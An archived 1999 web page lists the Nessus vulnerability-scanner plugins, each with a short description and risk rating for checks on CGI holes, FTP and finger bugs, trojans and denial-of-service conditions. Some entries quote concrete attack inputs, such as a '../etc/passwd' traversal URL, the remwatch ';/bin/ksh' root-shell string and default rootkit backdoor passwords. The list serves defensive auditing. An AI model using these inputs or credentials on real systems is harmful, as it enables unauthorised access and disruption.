exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

nessus-plugins.html

nessus-plugins.html
Posted Aug 17, 1999
Authored by The Nessus Project

Nessus Vulnerability Checklist - This checklist, with excellent descriptions of over 180 of the most common and serious vulnerabilities, is useful not just for Nessus users, but for anyone who is in the process of closing security holes and locking down systems.

tags | tool, scanner, vulnerability
systems | unix
SHA-256 | 94b95ba9469e1ed4f6c8b60d022b2392a4ea8ec7d3ac55958e8d3f9cb01b2c31

nessus-plugins.html

Change Mirror Download
<table>
<title>Nessus 990201 Plugins list</title>
<body bgcolor="white">
Here is the exhaustive plugin list of Nessus 990201 :

<tr><td>Attack</td><td>WebSite 1.0 buffer overflow</td><td>executes some code on a remote host running WebSite 1.0</td><td>There is a buffer overflow in some WebSite 1.0 CGI scripts which allow a remote intruder to execute any command on the remote host Platform affected : WindowsNT Risk factor : High</td><td>no copyright</td></tr>
<tr><td>Denial of Service</td><td>Annex</td><td>crashes an Annex terminal server</td><td>It is possible to crash an Annex terminal server by sending a too long argument to the 'ping' CGI. Risk factor : High</td><td>found by the Redes2 Security Team</td></tr>
<tr><td>Denial of Service</td><td>ascend kill</td><td>reboots an ascend router</td><td>It is possible to reboot an ascend router by sending it a specially constructed UDP packet on the discard port (9). Risk factor : high</td><td>rootshell</td></tr>

<tr><td>Denial of Service</td><td>+ + + ATH0 modem hangup</td><td>makes a modem hangup</td><td>Most modems today follow the Hayes Command set (ATZ, ATDT, ATH0..) Unfortunately the way that these modems handle certain strings leaves them susceptible to a specific type of DoS attack. By forcing the victim to respond with the string "+ + +ATH0\modems will interpret the + + +ATH0 as the user manually attempting to enter command mode and execute a command. Because of this, when the victim attempts to respond with the + + +ATH0 the modem sees it within the IP datagram and hangs up the modem. It is also possible to make a remote modem hangup and then dial another number, forcing its owner to loose money Risk factor : medium</td><td>made after the bugtraq article of Max Schau (Noc-Wage) <wage@IDIRECT.CA></td></tr>

<tr><td>Information gathering</td><td>auth enabled</td><td>checks if auth is enabled</td><td>The auth service provides sensitives informations to the intruders : it can be used to find out which accounts are running which servers. This may help attackers to focus on services that are worth hacking (those owned by root) If you do not use this service, disable it in /etc/inetd.conf. Risk factor: medium</td><td>distrubuted under the GPL</td></tr>

<tr><td>Information gathering</td><td>BackOrifice</td><td>detects if BackOrifice is running on the remote host</td><td>BackOrifice is a Windows 95/98 Trojan usually listenning on the UDP port 31337, designed to take the control of the infected computer. This plugin determines if BO is running on the ports 31337 and 53. Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>BIND buffer overrun</td><td>determines if BIND can be attacked by a buffer overflow</td><td>BIND 4.9 releases prior to BIND 4.9.7 and BIND 8 releases prior to 8.1.2 do not properly bounds check a memory copy when responding to an inverse query request. An improperly or maliciously formatted inverse query on a TCP stream can crash the server or allow an attacker to gain root <br>privileges. This plugin determines if your BIND daemon can be affected by such an attack without actually gaining root access.<br>Risk factor : high</td><td>Original code by Joshua J. Drake (jdrake@pulsar.net)</td></tr>

<tr><td>Denial of Service</td><td>Bonk</td><td>another ip fragment denial of service</td><td>Variation of Teardrop which crashes some Windows boxes</td><td>bendi</td></tr>

<tr><td>Attack</td><td>Bootparamd presence check</td><td></td><td>When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which.<br>If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Bootparamd gives NIS domain</td><td></td><td>When a diskless client needs to boot, it uses the bootparam protocol to get the necessary information needed from the server. If bootparamd is running one can guess at which is the client and server or use a program such as bootparam_prot.x to determine which is which.<br>If an intruder uses BOOTPARAMPROC_WHOAMI and provides the address of the client, he will get it's NIS domain name back from bootparamd. If you know the NIS domain name, it may be possible to get a copy of the password file. One solution would be to filter incoming connections to port 111 (portmap) This plugin will attempt to retrieve the NIS domain name by giving to the remote bootparamd some computer names Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>campas</td><td>determines the presence of the 'campas' cgi</td><td>The 'campas' cgi allows a remote user to view any file on the local system, with the privileges of the http daemon (root or nobody).<br>This plugin determines if this cgi is installed on the remote host and tries to read a file (specified in the daemon preferences) on the remote server<br>Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>search.**@host cfingerd feature</td><td>determines if cfingerd sends the list of users of the remote system</td><td>There is a bug in the cfingerd daemon which allow a remote user to get the list of all the users of the vulnerable system. This information may be of some help to a darkside hacker<br>Risk factor : medium-high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>cgi jj</td><td>determines the presence of the 'jj' cgi</td><td>The 'jj' cgi allow a remote user to execute any command on the target system with the same privileges as the web server<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>perl interpreter can be launched as a CGI</td><td>determines if the perl interpreter can be launched as a cgi</td><td>Some badly configured web servers allow the users to execute the perl interpreter, which is not a good thing, since it is like giving a shell access to anyone. Removing the perl executable from the 'cgi-bin' directory solves this problem<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>Chameleon SMTPd overflow</td><td>buffer overflow for the Chameleon SMTP server</td><td>Chameleon SMTPd does not properly checks bounds of some string, and a remote user may force it to crash. This plugin only tests the 'HELP longtopic' exploit, although there are several others problems</td><td>problems found by Anton Rager arager@McGraw-Hill.com</td></tr>

<tr><td>Information gathering</td><td>Count.cgi (wwwcount)</td><td>determines the presence of the 'Count.cgi' (wwwcount)</td><td>The 'count.cgi' cgi is subject to a bug which allow a remote user to execute arbitrary commands on the attacked host<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>daytime check</td><td>determines if daytime is activated</td><td>This plugin determines if the daytime service is running. Sometimes, the date format issued by this service can help an intruder to guess the operating system of the remote host. This service is potentially vulnerable to spoofing attacks which can link the daytime port to the echo port consuming network bandwidth. You should disable this service if you do not use it Risk factor : low</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>default system accounts</td><td>telnet to the remote host and guess login/passwords</td><td>Several operating systems come with default accounts that have no or simple passwords. This plugin will attempt to connect to the remote host on the telnet port and will attempt to find those weak accounts</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>dumpenv</td><td>checks for the 'dumpenv' CGI</td><td>The dumpenv CGI is a cgi-script which is part of the Sambar server. It can give away several informations that don't need to be known to the public Risk factor : Low/Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>EWS (Excite for Web Servers) CGI hole</td><td>determines the presence of the 'phf' cgi</td><td>An EWS cgi allows a remote user to execute any command on the target system with the same privileges as the web server<br>Risk factor : High</td><td>found by Marc Merlin <marc_merlin@MAGIC.METAWIRE.COM></td></tr>

<tr><td>Attack</td><td>faxsurvey</td><td>determines the presence of the 'faxsurvey' cgi</td><td>There exist a bug in the 'faxsurvey' CGI-Script, which allows an attacker to execute any command he wants with the permissions of the HTTP-Server.<br>Risk factor : High</td><td>found by Tom <dod@MUENSTER.NET></td></tr>

<tr><td>Information gathering</td><td>finger features</td><td>determines if fingerd sends the list of the unused accounts of the remote system</td><td>This plugin determines whether there's a hole in the fingerd daemon of a remote host, allowing a remote user to gain the list of the users\ who have never logged in the remote system -- this is of some interest to a darkside hacker who may know which accounts are never used and try to force them, since they are not monitored<br>Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>finger backdoor check</td><td>determines if the remote fingerd is a trojan</td><td>A widely ditributed backdoor fingerd is used by script kiddies to maintain their accounts. Basically, this daemon recognizes several commands cmd_adduser cmd_stealth cmd_deluser cmd_rootsh cmd_cleanup Nessus will try the command 'cmd_rootsh' to determine if the remote finger daemon is a trojan If it is a trojan, it means that your system has been compromised, so you will have to double check its config Risk factor: High</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>finger</td><td>determines the presence of the 'finger' cgi</td><td>This plugins determines whether the 'finger' cgi is installed This cgi may lead to a denial of service of a remote server and may give some interesting informations to an intruder Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>finger redirection check</td><td>checks whether the remote finger accepts requests like user@host1@target</td><td>This plugin attempts to bounce a remote finger request through the target-host finger daemon. A request of the form : user@host2@target is made. If your finger daemon allows this kind of request, your host may be used by an attacker as a relay to gather informations about a third-party host. Solution : disable your finger daemon or replace it by a more secure one</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>firewall icmp check</td><td></td><td></td><td>licensed under the GPL</td></tr>

<tr><td>Attack</td><td>Microsoft Frontpage exploits</td><td>plays with Microsoft Frontpage extensions</td><td>Some Microsoft Frontpage extensions allow remote users to view any file on the system and to overwrite those file If vulnerable, a site must quickly contact Microsoft for a patch<br>Risk factor : High</td><td>Written after a paper from pedward@WEBCOM.COM</td></tr>

<tr><td>Information gathering</td><td>FSP Daemon</td><td>Checks if the remote host has a running FSP daemon</td><td>This plugin checks whether a host is running an FSP daemon. FSP is a file transfer protocol similar to FTP which uses UDP to transport files. FSP is widely used by attackers to move files from host to host. It is also used widely by software pirates to allow easy access to caches of illicit software. <br>If Nessus discovers that you are running a FSP daemon, you should check for the evidence of break-ins into the remote system Risk Factor: Medium</td><td>Based on the code of Wen-King Su (wen-king@vlsi.cs.caltech.edu)</td></tr>

<tr><td>Information gathering</td><td>anonymous ftp enabled</td><td>checks if the remote ftp server accepts anonymous logins</td><td>The 'ftp' service may allow anonymous logins. If the server admin decides to let this service open to the whole world, he must configure it so that anyone can not read anything on its server<br>It is usually not a good idea to let a anon ftp server opened with no real reason, since many FTP attacks require the intruder to log in... Risk factor : high if the anonymous FTP is badly setted up low if it is well configured</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>NULL Linux ftp backdoor</td><td>checks if the user NULL backdoor is present on the remote ftpd</td><td>There was a backdoor in the old ftp daemons of Linux, which allowed a remote user to log in with the username 'NULL', and then have the root privileges over FTP This plugin determines if it is present on the remote host<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp bounce</td><td>checks if the remote ftp server can be bounced</td><td>It is possible to force several FTP servers to connect to third parties hosts. This can be used by intruders to use your network resources to scan some other hosts, or it can be used to go through some firewalls Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp cwd ~root</td><td>attempts to log in as root</td><td>There is a bug in older versions of some FTP servers which would allow anonymous logins to be logged as root This plugin tries to see if this vulnerability is present on the remote ftp server Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp get /etc/passwd</td><td></td><td></td><td>this plugin is distributed under the GPL</td></tr>

<tr><td>Attack</td><td>ftp misc. overflows</td><td>attempts to find some buffer overflows on a remote ftp server</td><td>Some FTP server do not check the length of arguments of several commands and can thus exploit potential buffer overflows. This plugin attempts to find which commands are subject to possible buffer overflows<br> Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>in.ftpd PASS buffer overflow</td><td>attempts to overflow a remote ftp server</td><td>It is possible to overflow some in.ftpd deamons by sending a too long password. This may allow a remote intruder to execute arbitrary commands on the remote host.<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp PASV denial of service</td><td>attempts to do a PASV dos</td><td>Some FTP servers allow any user to make any number of PASV commands, thus blocking the free ports for legitimate services This plugin attempts to issue a given number of those commands<br> Risk factor : medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp PASV on connect crashes the FTP server</td><td>issues a PASV command upon the connection</td><td>Some FTP servers dump core when they are issued a PASV command as soon as the client connects. The FTP server will write a world readable core file which contains portions of the shadowed password file. This flaw allows local users to obtain the shadowed password file. Risk factor: medium/high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp real path</td><td>attempts to get the real path to the remote ftp home</td><td>It is possible to get the real path to the ftp home by issuing the 'CWD' command This information may be of some interest to an intruder who know where to put a '.rhosts' file<br>Risk factor : low</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp writeable root</td><td>attempts to write on the root of a remote ftp server</td><td>It is sometime possible to write on the root dir of a remote ftp server, which is a real problem since any hacker can upload a '.forward' or '.rhosts' file and then get a shell easily<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>wu-ftpd 'site exec' bug</td><td>checks if the 'site exec' bug of wu-ftpd is present</td><td>Some wu-ftpd daemons are subject to the 'site exec' bug which allow a local user to gain root priviledges This plugin determines if the remote ftp server is subject to this bug<br>Risk factor : medium (remotely) / high (locally)</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>in.ftpd USER buffer overflow</td><td>attempts to overflow a remote ftp server</td><td>It is possible to overflow some in.ftpd deamons by sending a too long username. This may allow a remote intruder to execute arbitrary commands on the remote host.<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>ftp writeable directories</td><td></td><td></td><td>this plugin is distributed under the GPL</td></tr>

<tr><td>Attack</td><td>glimpse</td><td>determines the presence of the 'glimpse' cgi</td><td>This plugin determines whether the 'glimpse' cgi is installed This cgi allows a remote user execute any commands on the server<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Remote gopher server can be used as a proxy</td><td>checks for a bad gopherd</td><td>Most gopher servers accepts to act as a FTP proxy. Thus, sending a request like : ftp:any.ftp.site.com@/ to the remote gopher server will make it act as a proxy. This vulnerability can be used by attackers to bypass your firewall (if the gopher server is trusted by the firewall). In addition to that, your host may server as a launch pad to attack some other sites via FTP You should also note that gopherd offers poor logging options Risk factor : very high</td><td>Renaud Deraison <deraison@worldnet.fr></td></tr>

<tr><td>Information gathering</td><td>guess operating system</td><td>guesses the remote OS</td><td>This plugin attempts to guess the type of the remote operating system by looking at the telnet and ftp banners</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>handler</td><td>determines the presence of the bug of the 'handler' cgi</td><td>This plugin determines whether a bug of the 'handler' cgi is present on a remote host. This bug allows a remote user to execute any command on the server Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Hidepak</td><td>tries to login to the remote system using the default Hidepak password</td><td>'Hidepak' is the name of a popular set of Solaris utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wank</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Hidesource</td><td>tries to login to the remote system using the default Hidesource password</td><td>'Hidesource' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is wank/wank</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>HP Laserjet printer has no password</td><td>notifies the user that the remote printer has no password</td><td>This plugin attempts to see if the remote HP Laserjet printer has a password. A passwordless printer is a threat since it allows an attacker to change the printer's IP, thus resulting in creating network problems.</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>htmlscript</td><td>determines the presence of the 'htmlscript' cgi</td><td>This plugin determines whether the 'htmlscript' cgi in installed This cgi allows a remote user to view any file on a given host<br>Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>iChat</td><td>determines if iChat is vulnerable to a stupid bug</td><td>iChat servers up to version 3.00 allow any remote user to view any file on the target system by doing the following request : http://chat.server.com:4080/../../../etc/passwd<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>iParty</td><td>shuts down a remote iParty server</td><td>iParty is an audio/text chat program for Windows. The iParty server listens on a specified port (6004 is default) for client requests. If someone connects to the chat server and sends a large amount of ASCII 255 chars, the server will simply close itself and disconnect all the current users. Risk factor : Low/Medium</td><td>found by HD Moore <hdmoore@USA.NET></td></tr>

<tr><td>Information gathering</td><td>icat</td><td>determines the presence of the 'icat' cgi</td><td>This plugin determines the presence of the 'icat' cgi Some versions of this cgi allows a remote user to view any file on a WindowsNT system<br>Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>icmp broadcast check</td><td></td><td></td><td>licensed under the GPL</td></tr>

<tr><td>Information gathering</td><td>icmp netmask request</td><td></td><td></td><td>licensed under the GPL</td></tr>

<tr><td>Denial of Service</td><td>icmp redirect</td><td></td><td></td><td>licensed under the GPL</td></tr>

<tr><td>Information gathering</td><td>icmp timestamp request</td><td></td><td></td><td>licensed under the GPL</td></tr>

<tr><td>Denial of Service</td><td>IIS 'GET ../.. '</td><td>performs a denial of service against IIS</td><td>It is possible to crash IIS by sending it the request 'GET ../..' Risk factor : medium/high</td><td>No copyright</td></tr>

<tr><td>Information gathering</td><td>imap buffer overflow</td><td>imap buffer overflow</td><td>There's a bug on some versions of Imap which allow a remote user to become root using a buffer overflow This plugin determines if the remote imap is subject to this attack<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>in.fingerd '|command@host' bug</td><td>determines if in.fingerd is exploitable</td><td>Some versions of in.fingerd allow a remote user to execute arbitrary commands on a remote host. This plugin tries to execute '/bin/id'<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>info2www</td><td>determines the presence of the 'info2www' cgi</td><td>This plugin determines whether the 'info2www' cgi is installed on a remote computer. This cgi allows a remote user to execute any command on a given server<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>inn buffer overflow</td><td>determines if inn is vulnerable</td><td>This plugin determines whether inn is vulnerable Some old version on inn may be exploited using a remote buffer overflow<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>ircd killer</td><td>attempts to crash ircd</td><td>This plugin tries to crash a remote ircd server by sending it a very long string Risk factor : medium</td><td>original code by fx of nnh (aaron@ug.cs.dal.ca)</td></tr>

<tr><td>Information gathering</td><td>HP JetDirect TCP/IP problems: display hack</td><td>attempts to write 'Nessus succeeded' on the remote printer LCD</td><td>It is sometimes possible to hack the display of a JetDirect printer, thus making write any text. This can be used by attackers in social engineering attack : first, write a 'hotline' phone number on the printer, then make the printer crash (using some well known methods tested by Nessus). This plugin attempts to write 'Nessus succeeded' on the printer display, but it can not check if it succeeds, so you will have to check by yourself. Risk factor: Low</td><td>Based on the exploit by Silicosis sili@l0pht.com</td></tr>

<tr><td>Information gathering</td><td>HP JetDirect TCP/IP problems: single thread</td><td>checks if anyone can cause a DoS of the printer via the single threaded architecture of the printer</td><td>See the ISS Security Advisory of the same name Basically, the older JetDirect interfaces have several problems. One of them is the fact that the HP JetDirect is single-threaded so when one of the ports is occupied, the other ports are unavailable. The consequence of this problem is that the printer can't emulate properly the spooler caracteristics. This can allow a malicious user to prevent other people from printing their work. Risk factor: Low</td><td>based on the ISS Security Advisory of the same name</td></tr>

<tr><td>Denial of Service</td><td>land</td><td>denial of service using the 'land' attack</td><td>Some implementations of TCP/IP are vulnerable to packets that are crafted in a particular way (a SYN packet in which the source address and port are the same as the destination--i.e., spoofed). This plugin tries to crash a remote host using this attack<br>Risk factor : high</td><td>M3lt, FLC</td></tr>

<tr><td>Attack</td><td>Linux TFTP get file</td><td>Attempts to grab a via through a bug in some versions of tftp</td><td>There is a faulty access control implementation in some versions of the Linux tftp daemon. Most current tftpd implementations attempt to restrict access to files outside of the tftproot directory. The Linux implementations disallow any files with /../ in their pathnames, however one can still access files such as /etc/passwd by prepending ../ in front of the pathname (../etc/passwd). This will work since the current directory for tftpd is usually /ftpchr Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>lpd is active</td><td>notifies the user that lpd is available</td><td>Some badly configured line printer daemons (lpd) allow anyone to use the printer they are in charge of. This may allow an attacker to cause denials of service by filling the printer queue, or to waste paper and ink.<br>Risk factor : medium</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>mdaemon</td><td>buffer overflow for MDaemon SMTP server</td><td>It is possible to crash a remote MDaemon SMTP server by sending it a string which is too long. Once it's crashed, MDaemon must be restarted by hands, and the workstation can't receive mails<br>Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>MetaInfo servers</td><td>Read everything using '../../' in the URL</td><td>Several versions of MetaInfo servers allow remote users to read file they are not allowed to, by entering '../../' in the URL. Platform affected: WindowsNT Risk factor : High</td><td>discovered by Jeff Forristal <jeff@WIRETRIP.NET></td></tr>

<tr><td>Information gathering</td><td>Motorola Cable router vulnerability</td><td>Checks for a vulnerability in Motorola Cable modems</td><td>It is sometimes possible to reconfigure a Motorola Cable router by connecting to it on port 1024 and using the good login/password (which is by default : 'cablecom/router') This plugin will attempt to connect to the remote host on port 1024 and will check if ever this vulnerability is present</td><td>discovered by January <january@spy.net></td></tr>

<tr><td>Attack</td><td>mountd overflow</td><td>determines if the remote mountd may be overflowed</td><td>Some versions of mountd can be overflowed remotely, giving root access to anyone. This plugin will not determine if the remote host is vulnerable, but just warns the user if the remote mountd accepts a too long argument Warning: this plugin may crash your mount daemon<br>Risk factor: high</td><td>based on LucySoft [ luci@transart.ro ] exploit</td></tr>

<tr><td>Denial of Service</td><td>Microsoft Personnal Web Server</td><td>performs a denial of service against MSPersonal Web Server</td><td>It is possible to crash Microsoft Personnal Web Server by sending it a too long string. The MacOS 8.5.1 web sharing is affected too.<br>Risk factor : medium/high</td><td>discovered by Gurney Halleck <gurneyh@ix.netcom.com></td></tr>

<tr><td>Denial of Service</td><td>nestea</td><td>'off by one IP header' bug</td><td>nestea is a variation of the teardrop attack which makes linux kernels die<br>Risk factor : high</td><td>Copyright (c) 4/16/98 humble of rhino9</td></tr>

<tr><td>Information gathering</td><td>NetBus</td><td>detects if NetBus is running on the remote host</td><td>NetBus is a trojan horse designed to take the control of a Win 95/98/NT computer. This plugin detects if it is installed... Risk factor : medium/high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Netscape Server ?PageServices bug</td><td>make a request like http://foo.bar.edu/?PageServices</td><td>Requesting an URL with '?PageServices' at its end makes some Netscape servers dump the listing of the page directory, thus showing potentially sensitive files Risk factor : Medium/High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Netscape FastTrack 'get'</td><td>determines if the remote web server dumps the listing of / when issued the 'get' command</td><td>When some versions of the Netscape FastTrack server are issued a lower cased 'GET' command, they happily return the file listing of the current directory, rather than displaying the 'index.html' file of the directory. This vulnerability may help the intruders to find out files that are normally hidden. Risk factor : Low/Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>nfs world export</td><td>check if a host exports a filesystem to anyone</td><td>Some servers exports any file to anybody, and it's usually not a good thing to do<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td></td><td></td><td></td><td></td><td></td></tr>

<tr><td>Attack</td><td>NIS check domain</td><td></td><td>This plugin attempts to guess the remote NIS domain name. To do so, it retrieves the index of the remote NIS maps of the target. If it is successful, it means that you have incorrectly chosen your NIS domain name, and this is a problem since it allows remote attackers to get your NIS maps easily -- especially your passwd map.<br>Risk factor : High</td><td>code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik (casper@fwi.uva.nl). </td></tr>

<tr><td>Attack</td><td>NIS server</td><td>determines if the remote host is a NIS server</td><td>The NIS service is mainly used to share password files among the hosts of a given network. These files must not be intercepted by the intruders. The first step of their attack is to find out whether the host they are attacking is a NIS server. This plugin will attempt to see if the remote host is a NIS server.<br>Risk factor : medium</td><td>distributed under the GPL</td></tr>

<tr><td>Port scanner</td><td>Nmap tcp connect() scan</td><td></td><td></td><td>Taken from Fyodor's Nmap</td></tr>

<tr><td>Information gathering</td><td>nph-test-cgi</td><td>determines the presence of the 'nph-test-cgi' cgi</td><td>Determination of the presence of the 'nph-test-cgi' cgi</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Windows NT ftp 'guest' account</td><td>checks if there's a 'guest' account on the remote WindowsNT ftp server</td><td>This plugin determines whether the 'guest' account of a remote WindowsNT box has been disabled</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>NT RAS PPTP</td><td>WindowNT DoS</td><td></td><td>Kevin Wormington <kworm@SOFNET.COM></td></tr>

<tr><td>Denial of Service</td><td>Oracle Webserver denial of service</td><td>overflows the buffer of the remote ows</td><td>Version 2.1 of Oracle Webserver can be lead to a denial of service if it is sent a too long string argument Risk factor : Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>pcnfsd sends the printers list</td><td></td><td></td><td>ga <duncan@mygale.org></td></tr>

<tr><td>Attack</td><td>pcnfsd sends the users list</td><td></td><td></td><td>ga <duncan@mygale.org></td></tr>

<tr><td>Attack</td><td>pcnfsd warning</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>pfdispaly</td><td>determines the presence of the 'pfdispaly' cgi</td><td>The 'pfdispaly' cgi allow a remote user to read any file on the remote workstation<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>phf</td><td>determines the presence of the 'phf' cgi</td><td>The 'phf' cgi allow a remote user to execute any command on the target system with the same privileges as the web server<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>php</td><td>determines the presence of the 'php' cgi</td><td>The 'php' cgi allow a remote user to read any file on the target system with the same privileges as the web server.<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>php-cgi buffer overflow</td><td>overflows the buffer of the remote 'php' cgi</td><td>Some versions of the 'php' cgi can be overflowed thus allowing a remote user to execute arbitrary commands on the remote host. This plugin checks if the remote php is can be attacked this way Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>Livingston PortMaster crash</td><td>crashes a Livingston PortMaster</td><td>It is possible to crash a remote Livingston PortMaster by overflowing its buffers.<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Denial of Service</td><td>pnserver DoS</td><td>attempts to crash PN Real Video Server</td><td> It's possible to crash some versions of the Progressive Networks Real Video Server by sending it some garbage.<br>Risk Factor : Medium</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>pop3 buffers overflows</td><td>pop3 buffers overflows</td><td>There's a bug on some versions of pop3d which allow a remote user to become root using a buffer overflow This plugin determines if the remote pop3d is subject to this attack<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>Portmapper check</td><td></td><td>The portmapper is the central program for RPC programs. If an attacker can connect to it, he can find which RPC services are running and can make a more accurate attack. Risk factor : Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Proxy CONNECT check</td><td>checks for badly configured proxies</td><td>Some misconfigured proxy accepts the CONNECT requests of their clients, which is a very bad thing since it can allow anyone to bypass a firewall and to use the proxy as a launch pad for attacking another site Risk factor : very high</td><td>Renaud Deraison <deraison@worldnet.fr></td></tr>

<tr><td>Attack</td><td>Proxy GET check</td><td>checks for badly configured proxies</td><td>Some misconfigured proxies accept requests like asking some non-WWW ports (ie: 25). This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if : a) The remote proxy accepts our requests (which may be a bad thing) b) The remote proxy accepts our requests on bogus ports If the remote proxy accepts requests on bogus ports, this may allow an attacker to bypass a firewall.<br>Risk factor : very high</td><td>Renaud Deraison <deraison@worldnet.fr></td></tr>

<tr><td>Attack</td><td>Proxy POST check</td><td>checks for badly configured proxies which accepts to redirect POST</td><td>Some misconfigured proxies accepts requests like POST http://somehost:25. This is a security flaw since it allows the anonymous redirection of connections. This plugin checks if the remote proxy accepts POST requests going anywhere Risk factor : very high</td><td>Renaud Deraison <deraison@worldnet.fr></td></tr>

<tr><td>Information gathering</td><td>qpopper buffer overflow</td><td>qpopper buffer overflow</td><td>There's a bug on some versions of qpopper which allow a remote user to become root using a buffer overflow This plugin determines if the remote qpopper is subject to this attack<br>Risk factor : high</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>r-commands check</td><td>checks the presence of the r-commands (rsh,rlogin...)</td><td>Some people install a proxy which is supposed to act as a firewall, and feel safe, even though they have not disabled the r-commands (rlogin, rsh...) This plugin checks that the rservices of a firewall protected computer are unavailable<br>Risk factor : high</td><td>Licensed under the GPL</td></tr>

<tr><td>Denial of Service</td><td>recursive finger</td><td>denial of service using finger root@@@@(...)@host</td><td>It is possible to lead to a denial of service using the recursive finger method, which consists in sending to the remote host a finger request containing a lot of '@'<br>Risk factor : Medium</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>remwatch</td><td>remwatch exploit (hpux)</td><td>Some versions of the 'remwatch' daemon allow may spawn a shell with the root priviledges if the string '11T ;/bin/ksh' is entered<br>Risk factor : High</td><td>no copyright</td></tr>

<tr><td>Information gathering</td><td>rexecd check</td><td>checks for the precence of the rexec service</td><td>Because rexec uses unprivileged ports for the whole process, any user can send a request to a rexecd requesting connection of the stderr stream to an arbitrary port on the client machine. Since the client is unprivileged, there is no possibility for the legitimate stderr stream to be destined for a privileged port. In addition, spoofing techniques could allow the client to direct the stderr stream towards an arbitrary host as well as an arbitrary port, possibly exploiting a given trust model. Since rexecd terminates if the stderr port can't be connected to, and the port can be specified, rexecd can be used to easily scan the client host from the server host. Risk factor : medium</td><td>Licensed under the GPL</td></tr>

<tr><td>Attack</td><td>RootKit</td><td>tries to login to the remote system using the default RootKit password</td><td>'RootKit' is the name of a popular set of SunOS utilities that are used by hackers to backdoor a compromised host. This plugin attempts to check if this kit has been installed by trying the default username and password which is root/D13HH[</td><td>no copyright</td></tr>

<tr><td>Attack</td><td>3270 mapper service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>X25 service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>alis service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>database service</td><td></td><td></td><td>no copyright</td></tr>

<tr><td>Attack</td><td>Etherstatd service</td><td></td><td></td><td>no copyright</td></tr>

